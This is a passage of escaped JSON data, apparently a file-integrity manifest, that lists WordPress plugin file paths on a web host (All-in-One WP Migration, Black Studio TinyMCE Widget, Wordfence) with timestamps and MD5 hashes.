class-ai1wm-report-controller.php\":{\"d\":1545638083,\"h\":\"fa4a23ee54dc0b042542460f0c8b7410\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/controller\\/class-ai1wm-feedback-controller.php\":{\"d\":1545638083,\"h\":\"453904d6cb982e959e2b6512592560ca\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/controller\\/class-ai1wm-main-controller.php\":{\"d\":1545638083,\"h\":\"9710c623c394b379d7f48b77b03cf94f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/controller\\/class-ai1wm-export-controller.php\":{\"d\":1545638083,\"h\":\"2ce8f3c20e904a1857ee600a6652135a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/model\\/import\\/class-ai1wm-import-content.php\":{\"d\":1545638083,\"h\":\"d637f15d4f67f2f06da80f3c9b692ece\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/model\\/import\\/class-ai1wm-import-database.php\":{\"d\":1545638083,\"h\":\"71032c5b53f1d1bbd18b179bb067b57e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/model\\/import\\/class-ai1wm-import-validate.php\":{\"d\":1545638083,\"h\":\"e684d03278693effc7e6b16992551b5a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/model\\/import\\/class-ai1wm-import-compatibility.php\":{\"d\":1545638083,\"h\":\"0fa9cc82624309370b25d8077618df3b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/model\\/import\\/class-ai1wm-import-confirm.php\":{\"d\":1545638083,\"h\":\"0308e038a50415e967eb0a6d8237ec73\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/model\\/import\\/class-ai1wm-import-enumerate.php\":{\"d\":1545638083,\"h\":\"9ec6adaac38a41f164c0b86ab1fb9b54\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/model\\/import\\/class-ai1wm-import-mu-plugins.php\":{\"d\":1545638083,\"h\":\"a45fe90b704adf11029a441a67fc1c8e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/model\\/import\\/class-ai1wm-import-upload.php\":{\"d\":1545638083,\"h\":\"4b2d644d188033f4156ab6fa1f7d4729\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/model\\/import\\/class-ai1wm-import-done.php\":{\"d\":1545638083,\"h\":\"df1661df081ec5ab74d3794ea12c7409\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/model\\/import\\/class-ai1wm-import-blogs.php\":{\"d\":1545638083,\"h\":\"6e854ddf8514354b385d0931914ec1c1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/model\\/import\\/class-ai1wm-import-clean.php\":{\"d\":1545638083,\"h\":\"18b48c6de5f752ca946852f897c4d54f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/model\\/export\\/class-ai1wm-export-compatibility.php\":{\"d\":1545638083,\"h\":\"5ef1215e6ead03b5fa24c5124b7130be\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/model\\/export\\/class-ai1wm-export-init.php\":{\"d\":1545638083,\"h\":\"74043d5baadca7f3ac3bf728354fefb0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/model\\/export\\/class-ai1wm-export-clean.php\":{\"d\":1545638083,\"h\":\"118a3fe862bedc2ca2373519d7e137c3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/model\\/export\\/class-ai1wm-export-download.php\":{\"d\":1545638083,\"h\":\"59432c7f0d3b5802126be30d32a8f57b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/model\\/export\\/class-ai1wm-export-enumerate.php\":{\"d\":1545638083,\"h\":\"0c9784bc0d47508356f32db4ac099914\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/model\\/export\\/class-ai1wm-export-config-file.php\":{\"d\":1545638083,\"h\":\"8113a1d43b0985bf661f4a577351e39f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/model\\/export\\/class-ai1wm-export-database-file.php\":{\"d\":1545638083,\"h\":\"272cdaa8733faf7ecf3967a83486820e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/model\\/export\\/class-ai1wm-export-archive.php\":{\"d\":1545638083,\"h\":\"fbc7d98e7cdf1877cc0d8d4569ffb58d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/model\\/export\\/class-ai1wm-export-database.php\":{\"d\":1545638083,\"h\":\"4ebfd01c2371eb9391139987ed3ae50a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/model\\/export\\/class-ai1wm-export-config.php\":{\"d\":1545638083,\"h\":\"2c8f135bac81fbcd8410f46ccd58670f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/model\\/export\\/class-ai1wm-export-content.php\":{\"d\":1545638083,\"h\":\"87ea152a83515f8d101197240d102c1f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/model\\/class-ai1wm-deprecated.php\":{\"d\":1545638083,\"h\":\"ee75d9bec06f4ccfba58918978aea73f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/model\\/class-ai1wm-report.php\":{\"d\":1545638083,\"h\":\"5c25ce3b72c72f284131b67fd1d45b12\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/model\\/class-ai1wm-backups.php\":{\"d\":1545638083,\"h\":\"874a4c8d609a7ee893beb5c1bae77752\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/model\\/class-ai1wm-handler.php\":{\"d\":1545638083,\"h\":\"c686c58ba07d2ff90054508cd8c97b1d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/model\\/class-ai1wm-template.php\":{\"d\":1545638083,\"h\":\"7e790c5f1135db6c5b6af75849351180\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/model\\/class-ai1wm-notification.php\":{\"d\":1545638083,\"h\":\"4736bb13b63ce1e1d7ef1c6a4fef119c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/model\\/class-ai1wm-extensions.php\":{\"d\":1545638083,\"h\":\"fc67be5bbbd2d12b3524196697ca58af\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/model\\/class-ai1wm-status.php\":{\"d\":1545638083,\"h\":\"11e0c77c6c44dbe491bd417d172bfde3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/model\\/class-ai1wm-compatibility.php\":{\"d\":1545638083,\"h\":\"336791e4c32830da8a9404be0f75700b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/model\\/class-ai1wm-updater.php\":{\"d\":1545638083,\"h\":\"778544914ad399645f15ece31c1a17e9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/model\\/class-ai1wm-feedback.php\":{\"d\":1545638083,\"h\":\"e80aa5121a467a2ef5764d6752668468\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/model\\/class-ai1wm-log.php\":{\"d\":1545638083,\"h\":\"5b2fb9f12453c57649e68527190fae42\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/lib\\/model\\/class-ai1wm-message.php\":{\"d\":1545638083,\"h\":\"c9d8c16d7c62e75b0e4ac2308b06a70b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/all-in-one-wp-migration.php\":{\"d\":1545638083,\"h\":\"7fb388581685da9488007e55987dc8cf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/constants.php\":{\"d\":1545638083,\"h\":\"08351267a923debe8552952f4098b3fd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/uninstall.php\":{\"d\":1545638083,\"h\":\"58b457e63bd94569fedf4d2cd4cc1822\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/exceptions.php\":{\"d\":1545638083,\"h\":\"5ce00bfb726b56c657530b5ca4b5be8f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/changelog.txt\":{\"d\":1545638083,\"h\":\"ea22038c125cfad8052f283a205835d7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/functions.php\":{\"d\":1545638083,\"h\":\"7b49406cfe6e1cba96176b4812b31255\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/deprecated.php\":{\"d\":1545638083,\"h\":\"d62804f3846a8009045dc30afbb7e7ff\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/loader.php\":{\"d\":1545638083,\"h\":\"cf9169459cc7f9b8f0e93cfcdfa68a2b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/LICENSE\":{\"d\":1545638083,\"h\":\"ed35246d9c78e0ad6c9bfdcc5094e425\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-wp-migration\\/readme.txt\":{\"d\":1545638083,\"h\":\"9e0389ef578d6a4dea74617e3e38d93a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/black-studio-tinymce-widget\\/css\\/black-studio-tinymce-widget.css\":{\"d\":1544704279,\"h\":\"51b715a655ae0ef7233442316f1e919d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/black-studio-tinymce-widget\\/css\\/black-studio-tinymce-widget-pre33.css\":{\"d\":1544704279,\"h\":\"cae09f31ae3f13171ba18a833783f5c6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/black-studio-tinymce-widget\\/css\\/black-studio-tinymce-widget-pre33.min.css\":{\"d\":1544704279,\"h\":\"823f923a6d7be97794f6c8292ba6d53e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/black-studio-tinymce-widget\\/css\\/black-studio-tinymce-widget.min.css\":{\"d\":1544704279,\"h\":\"1a476b5bd60d5cc4a017bbcb1361895e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/black-studio-tinymce-widget\\/languages\\/black-studio-tinymce-widget.pot\":{\"d\":1544704279,\"h\":\"c4964579512c8ba3407f5ff6c5dcc2c2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/black-studio-tinymce-widget\\/includes\\/class-text-filters.php\":{\"d\":1544704279,\"h\":\"46089353f17009e9090d69589893e65e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/black-studio-tinymce-widget\\/includes\\/class-compatibility.php\":{\"d\":1544704279,\"h\":\"864d14b3f4df5c876a3f3752121de9b7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/black-studio-tinymce-widget\\/includes\\/deprecated.php\":{\"d\":1544704279,\"h\":\"252aeda87b956686533aea68255afddb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/black-studio-tinymce-widget\\/includes\\/class-compatibility-plugins.php\":{\"d\":1544704279,\"h\":\"4d0606554b7379caa5358f09890c2171\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/black-studio-tinymce-widget\\/includes\\/class-widget.php\":{\"d\":1544704279,\"h\":\"d9184f13183086c44ca62951b29af427\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/black-studio-tinymce-widget\\/includes\\/class-admin-pointer.php\":{\"d\":1544704279,\"h\":\"37bf6a60633fd0636fa21892f4c15946\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/black-studio-tinymce-widget\\/includes\\/class-compatibility-wordpress.php\":{\"d\":1544704279,\"h\":\"95196a83d80c0a9744c7758005809c53\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/black-studio-tinymce-widget\\/includes\\/class-admin.php\":{\"d\":1544704279,\"h\":\"0a42abdb4470711307a3742d85f7aea1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/black-studio-tinymce-widget\\/js\\/black-studio-tinymce-widget-setup.js\":{\"d\":1544704279,\"h\":\"74db2cc6894a15a76b7a00853c9a2740\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/black-studio-tinymce-widget\\/js\\/black-studio-tinymce-widget-pre33.js\":{\"d\":1544704279,\"h\":\"9812b19b150419c971d3e7f839661a2a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/black-studio-tinymce-widget\\/js\\/black-studio-tinymce-widget.min.js\":{\"d\":1544704279,\"h\":\"a09ba2161047449fa71db4da99fb991a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/black-studio-tinymce-widget\\/js\\/black-studio-tinymce-widget-pointer.min.js\":{\"d\":1544704279,\"h\":\"681eb35faabd0061a957d2dda6545e08\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/black-studio-tinymce-widget\\/js\\/wp-page-widget.js\":{\"d\":1544704279,\"h\":\"667198fca2447281bb4f79a974ca83c9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/black-studio-tinymce-widget\\/js\\/black-studio-tinymce-widget-pre39.js\":{\"d\":1544704279,\"h\":\"4246237e449b0688f03cdaa03ec1f767\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/black-studio-tinymce-widget\\/js\\/black-studio-tinymce-widget.js\":{\"d\":1544704279,\"h\":\"f9dfa4a2377babcab412768c80ca3bce\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/black-studio-tinymce-widget\\/js\\/wp-page-widget.min.js\":{\"d\":1544704279,\"h\":\"e9292de302409e6ba48d918a2510eb80\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/black-studio-tinymce-widget\\/js\\/black-studio-tinymce-widget-pre39.min.js\":{\"d\":1544704279,\"h\":\"26ba1af13c51b74c733ee0981f7f928b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/black-studio-tinymce-widget\\/js\\/black-studio-tinymce-widget-pre33.min.js\":{\"d\":1544704279,\"h\":\"9fde8776f6e386ca818e5b27e1b5f4c7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/black-studio-tinymce-widget\\/js\\/black-studio-tinymce-widget-pointer.js\":{\"d\":1544704279,\"h\":\"808d073a88ad4e1632985fb4750bae65\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/black-studio-tinymce-widget\\/js\\/black-studio-tinymce-widget-setup.min.js\":{\"d\":1544704279,\"h\":\"17a071347f5c20cb337a0231cacfe6c7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/black-studio-tinymce-widget\\/black-studio-tinymce-widget.php\":{\"d\":1544704279,\"h\":\"f80dc486c6bc6763faf9fd43b7767f0b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/black-studio-tinymce-widget\\/readme.txt\":{\"d\":1544704279,\"h\":\"9eaf9ca5ebaa3107e19389792014c38f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/hello.php\":{\"d\":1542316128,\"h\":\"ae743fdef5c28fe0dc5771ceaa75dffc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/tmp\\/.htaccess\":{\"d\":1544704180,\"h\":\"b749a07a7ed269b62c1b4c9effe81e04\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/dashboard\\/widget_localattacks.php\":{\"d\":1544704180,\"h\":\"86d5d82f945d4c2f4762e8a9eb99fd3b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/dashboard\\/widget_notifications.php\":{\"d\":1544704180,\"h\":\"418a70bcf5af9c029b9fb0aed9c9526e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/dashboard\\/widget_ips.php\":{\"d\":1544704180,\"h\":\"191a63510ac56264d71f37ed2c5a0c65\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/dashboard\\/widget_networkattacks.php\":{\"d\":1544704180,\"h\":\"d4b6774bbbb5e0b57f3ee17ebdf10d67\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/dashboard\\/widget_content_countries.php\":{\"d\":1544704180,\"h\":\"c88eb51dff63d45095229ac183aff8d2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/dashboard\\/widget_logins.php\":{\"d\":1544704180,\"h\":\"671c96f1d5ec230614edfbbb405873c2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/dashboard\\/widget_content_logins.php\":{\"d\":1544704180,\"h\":\"158821509f79897438ed84ba50367187\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/dashboard\\/widget_countries.php\":{\"d\":1544704180,\"h\":\"fa0bcc0d6d95136ec45a42e2ce20bca5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/dashboard\\/widget_content_ips.php\":{\"d\":1544704180,\"h\":\"9ee0deddbb31b2e9f628776d46f2dfc2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/dashboard\\/widget_tdf.php\":{\"d\":1544704180,\"h\":\"32b2cfdd08bdad1827b3705b55618748\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/Diff\\/Renderer\\/Html\\/Array.php\":{\"d\":1544704180,\"h\":\"23bff0b925795d85bf2d626416aae58e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/Diff\\/Renderer\\/Html\\/SideBySide.php\":{\"d\":1544704180,\"h\":\"a77033fcb3b4db6c6ee6415f36cef6d0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/Diff\\/Renderer\\/Abstract.php\":{\"d\":1544704180,\"h\":\"3e0db019c3355d78564919d6278c69b5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/Diff\\/SequenceMatcher.php\":{\"d\":1544704180,\"h\":\"894fd22225c3a914be4fb2445ade046a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/wfArray.php\":{\"d\":1544704180,\"h\":\"f227466261db86c4e28291c131caa42f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/wfViewResult.php\":{\"d\":1544704180,\"h\":\"1cd939c2d6bf59434134147ce0b81870\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/wfAdminNoticeQueue.php\":{\"d\":1544704180,\"h\":\"9490874b0d1c7f1134582ec7f91e9099\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/viewFullActivityLog.php\":{\"d\":1544704180,\"h\":\"406c4dffd5331e4a748f4f4605bc0540\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/menu_scanner_options.php\":{\"d\":1544704180,\"h\":\"fe0d76ea09a5c70b0c6a458e8875f711\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/wfUpdateCheck.php\":{\"d\":1544704180,\"h\":\"9a7695f30b6b76291f04d592f669ae6a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/wfDiagnostic.php\":{\"d\":1544704180,\"h\":\"589109103a705b9ff419233658ba164e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/wfCrawl.php\":{\"d\":1544704180,\"h\":\"06c9162c0ee41130339bcd180dbf8ced\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/wordfenceURLHoover.php\":{\"d\":1544704180,\"h\":\"a89be162bc1302ff78fc526860b5ef92\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/wfVersionCheckController.php\":{\"d\":1544704180,\"h\":\"7e1a79a368025b2ac8fcfa5bc7a5ebb7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/email_unsubscribeRequest.php\":{\"d\":1544704180,\"h\":\"bc237db45fb42a6d44c39763767f8a57\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/wfDashboard.php\":{\"d\":1544704180,\"h\":\"de452fa4583abe15c6de77e69a39ed90\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/menu_options.php\":{\"d\":1544704180,\"h\":\"2e2bf28facd583b4647c7358ab783dbf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/live_activity.php\":{\"d\":1544704180,\"h\":\"320f173e281602825d2f40ea8f9e6688\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/conntest.php\":{\"d\":1544704180,\"h\":\"93aa710dc68989d5282e0b41cbace9dd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/wfRESTAPI.php\":{\"d\":1544704180,\"h\":\"c45c38f7d31fc348c120856d690cfc2b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/wfAPI.php\":{\"d\":1544704180,\"h\":\"f5c292802a60d1e7db954cd77ea4bd79\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/wfCrypt.php\":{\"d\":1544704180,\"h\":\"ae2aa85136d56c2f2afdde04a2e29349\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/wfImportExportController.php\":{\"d\":1544704180,\"h\":\"e348d51313c016f94d9eb62ebf8a9edc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/wfMD5BloomFilter.php\":{\"d\":1544704180,\"h\":\"9d9bebdf851e9777404c8be54feac152\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/menu_scanner_credentials.php\":{\"d\":1544704180,\"h\":\"66d1668c89883aa9e3d426f42cea5b95\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/wfDB.php\":{\"d\":1544704180,\"h\":\"50ad5f3c868ba42d31e95f5f49ac8875\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/wfBrowscap.php\":{\"d\":1544704180,\"h\":\"30be77b334cf5686063d8932b850dcf2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/menu_tools_livetraffic.php\":{\"d\":1544704180,\"h\":\"7660748ba603ca289243a183cc876e90\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/menu_tools_whois.php\":{\"d\":1544704180,\"h\":\"f8004a4d285d83eaf0a7b91a073777c2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/wfLockedOut.php\":{\"d\":1544704180,\"h\":\"699afe3145d6eb71453c0b55e24215a6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/wfHelperString.php\":{\"d\":1544704180,\"h\":\"a14f5688466144118e56de349834dcaa\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/wfStyle.php\":{\"d\":1544704180,\"h\":\"ab03c22345daf71ffd9434914da3eef2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/GeoLite2-Country.mmdb\":{\"d\":1544704184,\"h\":\"58cc2072ccd47e839b06c14c193461f0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/wfOnboardingController.php\":{\"d\":1544704184,\"h\":\"e10592a40e808d3adaef1a7c167e9c97\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/wfUtils.php\":{\"d\":1544704184,\"h\":\"f76c0b1d3b1a888abcbf5a913ed5c14f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/wf503.php\":{\"d\":1544704184,\"h\":\"45a908884717e7c5af4c195bd7186fe4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/wfDateLocalization.php\":{\"d\":1544704184,\"h\":\"eb34844b5f4afa32436d63cdadc774dd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/lib\\/wfIssues.php\":{\"d\":1544704184,\"h\":\"f0a0c17fb95f18e3871657eb09d63224\"},\"\\/home\\/norfaiz